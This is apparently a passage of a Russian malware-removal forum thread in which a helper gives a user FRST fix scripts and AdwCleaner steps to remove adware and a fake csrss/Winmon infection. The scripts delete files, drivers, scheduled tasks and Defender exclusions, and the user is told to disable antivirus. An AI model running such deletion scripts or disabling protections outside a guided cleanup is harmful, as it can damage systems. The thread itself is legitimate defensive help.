    2019-07-18 02:08 - 2019-07-18 02:16 - 000000000 ____D C:\Program Files\XHKZU2V44D
    2019-07-18 02:08 - 2019-07-18 02:08 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\y3lrrzpucgn
    2019-07-18 02:06 - 2019-07-18 02:06 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\EpicNet Inc
    2019-07-18 01:48 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\MachinerData
    2019-07-18 01:47 - 2019-07-18 01:47 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\r5cphmyvv4n
    2019-07-18 01:29 - 2019-07-18 13:02 - 000002890 _____ C:\Windows\System32\Tasks\mrAArNosEtAJT2
    2019-07-18 01:28 - 2019-07-18 13:02 - 000002850 _____ C:\Windows\System32\Tasks\JSpPUlYEOjGQEpF2
    2019-07-18 01:28 - 2019-07-18 01:32 - 000000000 ____D C:\Program Files\NUYSL1VMVS
    2019-07-18 01:28 - 2019-07-18 01:28 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\g1qxn0urxz0
    2019-07-17 23:49 - 2019-07-17 23:49 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\ch51whag4gk
    2019-07-17 20:12 - 2019-07-17 20:12 - 000000000 ____D C:\Users\Все пользователи\AppxeetouQ
    2019-07-17 20:12 - 2019-07-17 20:12 - 000000000 ____D C:\ProgramData\AppxeetouQ
    2019-07-18 02:29 - 2019-02-17 02:38 - 000000000 ____D C:\Windows\System32\Tasks\WiseCleaner
    2019-07-15 15:11 - 2019-02-17 02:44 - 000000000 ____D C:\ProgramData\ProductData
    2019-07-17 19:56 - 2019-07-17 19:56 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\4qavsr3x335\w11b02mylic.exe
    2019-07-17 23:49 - 2019-07-17 23:49 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\ch51whag4gk\0azhp2m0ygx.exe
    2019-07-17 16:58 - 2019-07-17 16:58 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\crnof3twn1e\kevyn4knivc.exe
    2019-07-18 01:28 - 2019-07-18 01:28 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\g1qxn0urxz0\m4usqulpfrg.exe
    2019-07-18 12:42 - 2019-07-18 12:42 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\jclyrksahme\hemqvsph1fz.exe
    2019-07-18 13:02 - 2019-07-18 13:02 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\o4wnkfzf33c\3hxl4zyymnv.exe
    2019-07-17 16:24 - 2019-07-17 16:25 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\zu4amnvtgvr\254qbvv2tp4.exe
    2019-07-18 12:42 - 2019-07-18 12:42 - 001005568 _____ (1VYUW) [File not signed] C:\Program Files\CZLZVGPLWK\CZLZVGPLW.exe
    2019-07-18 13:02 - 2019-07-18 13:02 - 001005568 _____ (1VYUW) [File not signed] C:\Program Files\KACSYMBLU9\KACSYMBLU.exe
    AlternateDataStreams: C:\ProgramData:NT [40]
    AlternateDataStreams: C:\ProgramData:NT2 [672]
    AlternateDataStreams: C:\Users\All Users:NT [40]
    AlternateDataStreams: C:\Users\All Users:NT2 [672]
    AlternateDataStreams: C:\Users\Все пользователи:NT [40]
    AlternateDataStreams: C:\Users\Все пользователи:NT2 [672]
    AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
    AlternateDataStreams: C:\ProgramData\Application Data:NT2 [672]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [672]
    AlternateDataStreams: C:\Users\Все пользователи\Application Data:NT [40]
    AlternateDataStreams: C:\Users\Все пользователи\Application Data:NT2 [672]
    AlternateDataStreams: C:\Users\Все пользователи\MTA San Andreas All:NT [40]
    AlternateDataStreams: C:\Users\Все пользователи\MTA San Andreas All:NT2 [672]
    AlternateDataStreams: C:\Users\Компауктер\Application Data:NT [40]
    AlternateDataStreams: C:\Users\Компауктер\Application Data:NT2 [672]
    AlternateDataStreams: C:\Users\Компауктер\AppData\Roaming:NT [40]
    AlternateDataStreams: C:\Users\Компауктер\AppData\Roaming:NT2 [672]
    MSCONFIG\startupreg: 1199918 => "C:\Users\Компауктер\AppData\Roaming\g50vfje1sxm\kw2oujfetig.exe" /VERYSILENT
    MSCONFIG\startupreg: 7408991 => "C:\Users\AD35~1\AppData\Local\Temp\is-D57PA.tmp\Quaturnion.exe" /VERYSILENT
    MSCONFIG\startupreg: App => 
    MSCONFIG\startupreg: M1EL7DP7TFB4IWX => "C:\Program Files\GV2XUUQ3YK\GV2XUUQ3Y.exe"
    FirewallRules: [{FB5A14E1-04D2-4CEE-A479-F9D0F041499A}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\DriverBooster.exe No File
    FirewallRules: [{729D7CE2-0A8F-481C-9EAD-416651D2C2B2}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\DriverBooster.exe No File
    FirewallRules: [{63BD42EC-C9A8-4A5E-A1AC-969747C9267B}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\DBDownloader.exe No File
    FirewallRules: [{B1094B8F-D703-466E-8417-82510E712F46}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\DBDownloader.exe No File
    FirewallRules: [{63460EDA-4745-45E6-8B5C-BF1EFE08E203}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\AutoUpdate.exe No File
    FirewallRules: [{129D4C2A-2AED-4237-ACD5-7D60625F594C}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\AutoUpdate.exe No File
    FirewallRules: [{817F3311-789D-4731-B1C5-197701BE0F59}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
    FirewallRules: [{2CF5048C-65B0-4D16-A2BD-FAD205FAC702}] => (Allow) C:\Users\Компауктер\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
    FirewallRules: [{2FA76B23-FC7F-4FB9-9D51-693C1EDC089F}] => (Allow) C:\Users\Компауктер\AppData\Local\Temp\csrss\lsa64.exe No File
    FirewallRules: [{A2299063-532E-407A-85F9-8A7D957B79AE}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
    FirewallRules: [{36FA02A3-85F3-44EE-B5E8-26EF6D6DC4FB}] => (Allow) C:\Users\Компауктер\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
    FirewallRules: [{9215F551-7558-4FD7-99FA-E1510C569A05}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
    FirewallRules: [{82AF2ECB-DB19-4F36-B8C5-24086FA7ADBE}] => (Allow) C:\Users\Компауктер\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
    FirewallRules: [{10B37ED2-AD39-4631-85DF-C8CAA33D8F89}] => (Allow) C:\Users\Компауктер\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
    FirewallRules: [{E83CD806-C03A-47FE-A1EA-53EE6E86272D}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
    ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
 

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
5,576
Реакции
1,857
Баллы
563
Еще один скрипт, пожалуйста.
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|csrss.exe
    DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|cloudnet.exe
    DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|windefender.exe
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
 

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
5,576
Реакции
1,857
Баллы
563
Удалите старые отчеты FRST.txt и Addition.txt и соберите свежие (инструкция в сообщении №6)
 

shutg

Новый пользователь
Сообщения
11
Реакции
0
Баллы
1
Есть прогресс, реклама не выскакивает..
 

Вложения

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
5,576
Реакции
1,857
Баллы
563
Судя по логам, значительно лучше. Ещё кое-что подчистим.

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    Task: {4F0A3FA6-863C-4334-90BA-BDA2BEDC20B5} - \mrAArNosEtAJT2 -> No File <==== ATTENTION
    BHO: YoutubeAdBlock -> {7F5C0C11-7E68-4D65-868E-AE2BE9EEB44E} -> C:\Program Files (x86)\vONNFjhTKIE\tl6Js7s.dll => No File
    BHO-x32: YoutubeAdBlock -> {7F5C0C11-7E68-4D65-868E-AE2BE9EEB44E} -> C:\Program Files (x86)\vONNFjhTKIE\k5C7RZn.dll => No File
    FF NewTab: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.NT
    R1 27dc587942c7edb8; C:\Windows\system32\drivers\27dc587942c7edb8.sys [30912 2019-07-17] (BlockChain Advances Ltd -> FsFilter Network)
    S1 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X]
    2019-07-18 12:45 - 2019-07-18 12:45 - 001435136 ____H C:\Windows\windefender.exe
    2019-07-18 12:44 - 2019-07-18 12:44 - 000023272 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\WinmonFS.sys
    2019-07-18 12:44 - 2019-07-18 12:44 - 000009352 _____ C:\Windows\system32\Drivers\Winmon.sys
    2019-07-17 19:56 - 2019-07-18 14:35 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\4qavsr3x335
    2019-07-17 16:58 - 2019-07-18 14:35 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\crnof3twn1e
    2019-07-17 16:08 - 2019-07-17 16:08 - 000000128 _____ C:\ProgramData\appdata.dat
    2019-07-17 16:05 - 2019-07-17 16:05 - 000030912 _____ (FsFilter Network) C:\Windows\system32\Drivers\27dc587942c7edb8.sys
    2019-07-17 16:04 - 2019-07-18 13:22 - 000000000 ____D C:\Program Files (x86)\Sending
    2019-07-17 16:03 - 2019-07-18 13:24 - 000000000 ___HD C:\Windows\rss
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Затем:
  • Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
  • Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt (где x - любая цифра).
  • Прикрепите отчет к своему следующему сообщению.

Подробнее читайте в этом руководстве.
 

shutg

Новый пользователь
Сообщения
11
Реакции
0
Баллы
1
Когда делал в FRST, программа переставала отвечать, приходилось перезагружать самостоятельно
 

Вложения

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
5,576
Реакции
1,857
Баллы
563
AdwCleaner[C00].txt - этот тоже покажите
 

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
5,576
Реакции
1,857
Баллы
563
Еще раз:
  • Запустите повторно AdwCleaner (by Malwarebytes) (программу необходимо запускать через правую кн. мыши от имени администратора).
  • В меню Настройки включите дополнительно в разделе Базовые действия:
    • Сбросить политики IE
    • Сбросить политики Chrome
  • В меню Панель управления нажмите Сканировать.
  • По окончании нажмите кнопку Очистить и восстановить и дождитесь окончания удаления.
  • Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt (где x - любая цифра).
  • Прикрепите отчет к своему следующему сообщению
Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

Подробнее читайте в этом руководстве.
 

akok

Команда форума
Администратор
Сообщения
17,958
Реакции
13,567
Баллы
2,203
Что с проблемой?
 
Сверху Снизу